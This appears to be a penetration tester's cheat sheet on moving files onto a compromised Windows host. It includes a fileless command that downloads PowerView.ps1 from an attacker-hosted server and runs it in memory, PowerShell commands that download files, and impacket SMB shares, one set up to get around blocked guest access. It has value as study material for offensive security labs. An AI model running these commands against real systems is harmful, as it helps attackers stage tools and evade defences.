Target: Windows

File Hash

Always verify the MD5 checksum of a file on both the target and attack hosts after transfer to ensure it wasn't corrupted or altered. It's a good habit for file integrity checks.

# Bash
md5sum filename

# PowerShell
Get-FileHash filename -Algorithm MD5

# Cmd
certutil -hashfile filename MD5

Transfer Techniques

Base64 Encode & Decode

# Base64 Encode the File
cat filename | base64 -w 0; echo

[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("BASE64-ENCODED-STRING"))

Fileless (Into Memory)

Host file using python http server then:

IEX (New-Object Net.WebClient).DownloadString('http://ip:port/PowerView.ps1')

DownloadFile Method

Host file using python http server then:

(New-Object Net.WebClient).DownloadFile('http://ip:port/filename','C:\Users\Public\Desktop\filename')
(New-Object Net.WebClient).DownloadFileAsync('http://ip:port/filename', 'C:\Users\Public\Desktop\filename')

Invoke-WebRequest (wget like)

Alias for Invoke-WebRequest are: curl, wget, iwr.

Host file using python http server then:

Invoke-WebRequest http://ip:port/filename -OutFile filename

# Add '-UseBasicParsing' to bypass IE Config

# Create a smb server
python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support .

copy \\TUN0\share\filename .

Bypass block unauthenticated guest access

In this scenerio, we can create the smb share using credentials:

python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support . -user rezydev -password rezydev

# Mount the SMB Share
net use n: \\TUN0\share /user:rezydev rezydev

copy n:\fileshare .

File Hash​

Transfer Techniques​

Base64 Encode & Decode​

Fileless (Into Memory)​

DownloadFile Method​

Invoke-WebRequest (wget like)​

SMB Share Method​

File Hash

Transfer Techniques

Base64 Encode & Decode

Fileless (Into Memory)

DownloadFile Method

Invoke-WebRequest (wget like)

SMB Share Method